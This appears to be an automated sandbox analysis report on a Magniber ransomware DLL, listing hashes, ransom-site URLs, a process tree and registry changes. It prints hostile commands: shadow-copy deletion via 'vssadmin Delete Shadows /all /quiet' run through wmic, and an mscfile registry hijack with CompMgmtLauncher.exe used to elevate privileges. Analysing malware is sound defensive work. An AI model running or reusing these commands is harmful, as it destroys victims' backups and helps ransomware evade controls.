Analysis
-
max time kernel
106s -
max time network
109s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
23-08-2021 16:11
Static task
static1
Behavioral task
behavioral1
Sample
e84e3a6b5db3f402f912a7afb328cb61.dll
Resource
win7v20210410
Behavioral task
behavioral2
Sample
e84e3a6b5db3f402f912a7afb328cb61.dll
Resource
win11
Behavioral task
behavioral3
Sample
e84e3a6b5db3f402f912a7afb328cb61.dll
Resource
win10v20210408
General
-
Target
e84e3a6b5db3f402f912a7afb328cb61.dll
-
Size
21KB
-
MD5
e84e3a6b5db3f402f912a7afb328cb61
-
SHA1
f57f4f7d2358c5b00a9a39fcdbb0d668e503dedc
-
SHA256
66c4f54da6542339de036872e80306f345b8572a71e782434245455e03541465
-
SHA512
1c60484518b489beb748641ee3983c698ed6253c63abc7818cf76e7fd76944977f1b83c7a762bd16f40945adf646b80de4058f59d775b708b276f754bbf63c91
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://08e86230e214c040f2dstzaaeww.xurvsjipiyubcsta.onion/dstzaaeww
http://08e86230e214c040f2dstzaaeww.laygive.site/dstzaaeww
http://08e86230e214c040f2dstzaaeww.loglook.club/dstzaaeww
http://08e86230e214c040f2dstzaaeww.tankmy.space/dstzaaeww
http://08e86230e214c040f2dstzaaeww.gorise.uno/dstzaaeww
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1980 800 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 324 800 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1316 800 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1812 800 cmd.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2628 800 vssadmin.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2620 800 vssadmin.exe 46 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 800 vssadmin.exe 46 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\RemoveStart.tiff => C:\Users\Admin\Pictures\RemoveStart.tiff.dstzaaeww Dwm.exe File renamed C:\Users\Admin\Pictures\InitializeStep.tif => C:\Users\Admin\Pictures\InitializeStep.tif.dstzaaeww Dwm.exe File opened for modification C:\Users\Admin\Pictures\RemoveStart.tiff Dwm.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1932 set thread context of 1132 1932 rundll32.exe 14 PID 1932 set thread context of 1240 1932 rundll32.exe 13 PID 1932 set thread context of 1288 1932 rundll32.exe 12 -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2628 vssadmin.exe 2620 vssadmin.exe 2612 vssadmin.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d447883c8aea408ab255e92da8a2180000000002000000000010660000000100002000000090c36c2286917431e08d89802c1df109ad29bb6c5f4db7a47278d6b9aa5d3960000000000e8000000002000020000000016e5a1251e0b10c913fe93bd0234300e5988aaced8e629480ef0d26ec3a0de82000000053fe10f3157f1cd754ad69af01ee3cbc7253c0182d6767aa5887c07a4e88fb934000000094aa2fc053e6749d7db99655fc4848180e9c92c0df4c3fc6de9b7c3fc8d20fd34214a36303ea60dd59464b579fb778d41567264f42760be1e5c709fbf7a5ad53 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0ac63203998d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "336499853" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000023d447883c8aea408ab255e92da8a218000000000200000000001066000000010000200000005d084d56519ab31c81a8ce49e3514358645f61547895de1dc1ff1ed81ae330ab000000000e8000000002000020000000a7910757aa739db871e4878e09c78fbf715bb5a1750d82bb0f8624f77e914d5890000000fe4ed72dfe992d089e399a0ab9fbff789f82e03fafcf70129edc74fab1b29666fde75c2b4be13bd84c8cb49f37c2a5699da9a95a88206ec6b4eede3a3ddbfc20b18731c1121b3ff778a9a3ef4697784a6c25b92a0fe72fe4546d84a57bbe17b881ac389be81bdf0ee9c149a257c80d6f8ef2db9f91975bbbfd717474408366cd0996fdb453abb2b5da4657096e21a87840000000a3faad6482f3f3e10543f4d8cc596cb1305f0a9f9c403191b6079f9ef8ef305347ef91af5e8a9d1b77b45407dcf6ba805e67331201a00f698a2f86f46c25ca40 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{472BD2C1-042C-11EC-9BAB-4EEA6C3C430B} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" rundll32.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1788 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1932 rundll32.exe 1932 rundll32.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1932 rundll32.exe 1932 rundll32.exe 1932 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1288 Explorer.EXE Token: SeShutdownPrivilege 1288 Explorer.EXE Token: SeShutdownPrivilege 1288 Explorer.EXE Token: SeShutdownPrivilege 1288 Explorer.EXE Token: SeIncreaseQuotaPrivilege 432 WMIC.exe Token: SeSecurityPrivilege 432 WMIC.exe Token: SeTakeOwnershipPrivilege 432 WMIC.exe Token: SeLoadDriverPrivilege 432 WMIC.exe Token: SeSystemProfilePrivilege 432 WMIC.exe Token: SeSystemtimePrivilege 432 WMIC.exe Token: SeProfSingleProcessPrivilege 432 WMIC.exe Token: SeIncBasePriorityPrivilege 432 WMIC.exe Token: SeCreatePagefilePrivilege 432 WMIC.exe Token: SeBackupPrivilege 432 WMIC.exe Token: SeRestorePrivilege 432 WMIC.exe Token: SeShutdownPrivilege 432 WMIC.exe Token: SeDebugPrivilege 432 WMIC.exe Token: SeSystemEnvironmentPrivilege 432 WMIC.exe Token: SeRemoteShutdownPrivilege 432 WMIC.exe Token: SeUndockPrivilege 432 WMIC.exe Token: SeManageVolumePrivilege 432 WMIC.exe Token: 33 432 WMIC.exe Token: 34 432 WMIC.exe Token: 35 432 WMIC.exe Token: SeIncreaseQuotaPrivilege 748 WMIC.exe Token: SeSecurityPrivilege 748 WMIC.exe Token: SeTakeOwnershipPrivilege 748 WMIC.exe Token: SeLoadDriverPrivilege 748 WMIC.exe Token: SeSystemProfilePrivilege 748 WMIC.exe Token: SeSystemtimePrivilege 748 WMIC.exe Token: SeProfSingleProcessPrivilege 748 WMIC.exe Token: SeIncBasePriorityPrivilege 748 WMIC.exe Token: SeCreatePagefilePrivilege 748 WMIC.exe Token: SeBackupPrivilege 748 WMIC.exe Token: SeRestorePrivilege 748 WMIC.exe Token: SeShutdownPrivilege 748 WMIC.exe Token: SeDebugPrivilege 748 WMIC.exe Token: SeSystemEnvironmentPrivilege 748 WMIC.exe Token: SeRemoteShutdownPrivilege 748 WMIC.exe Token: SeUndockPrivilege 748 WMIC.exe Token: SeManageVolumePrivilege 748 WMIC.exe Token: 33 748 WMIC.exe Token: 34 748 WMIC.exe Token: 35 748 WMIC.exe Token: SeIncreaseQuotaPrivilege 1656 WMIC.exe Token: SeSecurityPrivilege 1656 WMIC.exe Token: SeTakeOwnershipPrivilege 1656 WMIC.exe Token: SeLoadDriverPrivilege 1656 WMIC.exe Token: SeSystemProfilePrivilege 1656 WMIC.exe Token: SeSystemtimePrivilege 1656 WMIC.exe Token: SeProfSingleProcessPrivilege 1656 WMIC.exe Token: SeIncBasePriorityPrivilege 1656 WMIC.exe Token: SeCreatePagefilePrivilege 1656 WMIC.exe Token: SeBackupPrivilege 1656 WMIC.exe Token: SeRestorePrivilege 1656 WMIC.exe Token: SeShutdownPrivilege 1656 WMIC.exe Token: SeDebugPrivilege 1656 WMIC.exe Token: SeSystemEnvironmentPrivilege 1656 WMIC.exe Token: SeRemoteShutdownPrivilege 1656 WMIC.exe Token: SeUndockPrivilege 1656 WMIC.exe Token: SeManageVolumePrivilege 1656 WMIC.exe Token: 33 1656 WMIC.exe Token: 34 1656 WMIC.exe Token: 35 1656 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1288 Explorer.EXE 824 iexplore.exe 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE 1288 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 824 iexplore.exe 824 iexplore.exe 1600 IEXPLORE.EXE 1600 IEXPLORE.EXE 1600 IEXPLORE.EXE 1600 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 1240 wrote to memory of 1788 1240 Dwm.exe 26 PID 1240 wrote to memory of 1788 1240 Dwm.exe 26 PID 1240 wrote to memory of 1788 1240 Dwm.exe 26 PID 1240 wrote to memory of 1756 1240 Dwm.exe 27 PID 1240 wrote to memory of 1756 1240 Dwm.exe 27 PID 1240 wrote to memory of 1756 1240 Dwm.exe 27 PID 1240 wrote to memory of 1784 1240 Dwm.exe 28 PID 1240 wrote to memory of 1784 1240 Dwm.exe 28 PID 1240 wrote to memory of 1784 1240 Dwm.exe 28 PID 1784 wrote to memory of 1656 1784 cmd.exe 30 PID 1784 wrote to memory of 1656 1784 cmd.exe 30 PID 1784 wrote to memory of 1656 1784 cmd.exe 30 PID 1132 wrote to memory of 292 1132 taskhost.exe 33 PID 1132 wrote to memory of 292 1132 taskhost.exe 33 PID 1132 wrote to memory of 292 1132 taskhost.exe 33 PID 1932 wrote to memory of 1684 1932 rundll32.exe 35 PID 1932 wrote to memory of 1684 1932 rundll32.exe 35 PID 1932 wrote to memory of 1684 1932 rundll32.exe 35 PID 292 wrote to memory of 748 292 cmd.exe 39 PID 292 wrote to memory of 748 292 cmd.exe 39 PID 292 wrote to memory of 748 292 cmd.exe 39 PID 1684 wrote to memory of 432 1684 cmd.exe 38 PID 1684 wrote to memory of 432 1684 cmd.exe 38 PID 1684 wrote to memory of 432 1684 cmd.exe 38 PID 1756 wrote to memory of 824 1756 cmd.exe 37 PID 1756 wrote to memory of 824 1756 cmd.exe 37 PID 1756 wrote to memory of 824 1756 cmd.exe 37 PID 1288 wrote to memory of 1172 1288 Explorer.EXE 40 PID 1288 wrote to memory of 1172 1288 Explorer.EXE 40 PID 1288 wrote to memory of 1172 1288 Explorer.EXE 40 PID 1172 wrote to memory of 1752 1172 cmd.exe 43 PID 1172 wrote to memory of 1752 1172 cmd.exe 43 PID 1172 wrote to memory of 1752 1172 cmd.exe 43 PID 824 wrote to memory of 1600 824 iexplore.exe 53 PID 824 wrote to memory of 1600 824 iexplore.exe 53 PID 824 wrote to memory of 1600 824 iexplore.exe 53 PID 824 wrote to memory of 1600 824 iexplore.exe 53 PID 324 wrote to memory of 2112 324 cmd.exe 57 PID 324 wrote to memory of 2112 324 cmd.exe 57 PID 324 wrote to memory of 2112 324 cmd.exe 57 PID 1812 wrote to memory of 2136 1812 cmd.exe 58 PID 1812 wrote to memory of 2136 1812 cmd.exe 58 PID 1812 wrote to memory of 2136 1812 cmd.exe 58 PID 1316 wrote to memory of 2176 1316 cmd.exe 59 PID 1316 wrote to memory of 2176 1316 cmd.exe 59 PID 1316 wrote to memory of 2176 1316 cmd.exe 59 PID 1980 wrote to memory of 2208 1980 cmd.exe 60 PID 1980 wrote to memory of 2208 1980 cmd.exe 60 PID 1980 wrote to memory of 2208 1980 cmd.exe 60 PID 2208 wrote to memory of 2312 2208 CompMgmtLauncher.exe 65 PID 2208 wrote to memory of 2312 2208 CompMgmtLauncher.exe 65 PID 2208 wrote to memory of 2312 2208 CompMgmtLauncher.exe 65 PID 2112 wrote to memory of 2332 2112 CompMgmtLauncher.exe 62 PID 2112 wrote to memory of 2332 2112 CompMgmtLauncher.exe 62 PID 2112 wrote to memory of 2332 2112 CompMgmtLauncher.exe 62 PID 2136 wrote to memory of 2324 2136 CompMgmtLauncher.exe 64 PID 2136 wrote to memory of 2324 2136 CompMgmtLauncher.exe 64 PID 2136 wrote to memory of 2324 2136 CompMgmtLauncher.exe 64 PID 2176 wrote to memory of 2348 2176 CompMgmtLauncher.exe 61 PID 2176 wrote to memory of 2348 2176 CompMgmtLauncher.exe 61 PID 2176 wrote to memory of 2348 2176 CompMgmtLauncher.exe 61
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\e84e3a6b5db3f402f912a7afb328cb61.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵PID:1752
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1788
-
-
C:\Windows\system32\cmd.execmd /c "start http://08e86230e214c040f2dstzaaeww.laygive.site/dstzaaeww^&1^&40439685^&61^&307^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://08e86230e214c040f2dstzaaeww.laygive.site/dstzaaeww&1&40439685&61&307&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:824 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1600
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:292 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2312
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2332
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2348
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2324
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2628
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2620
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2612
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2740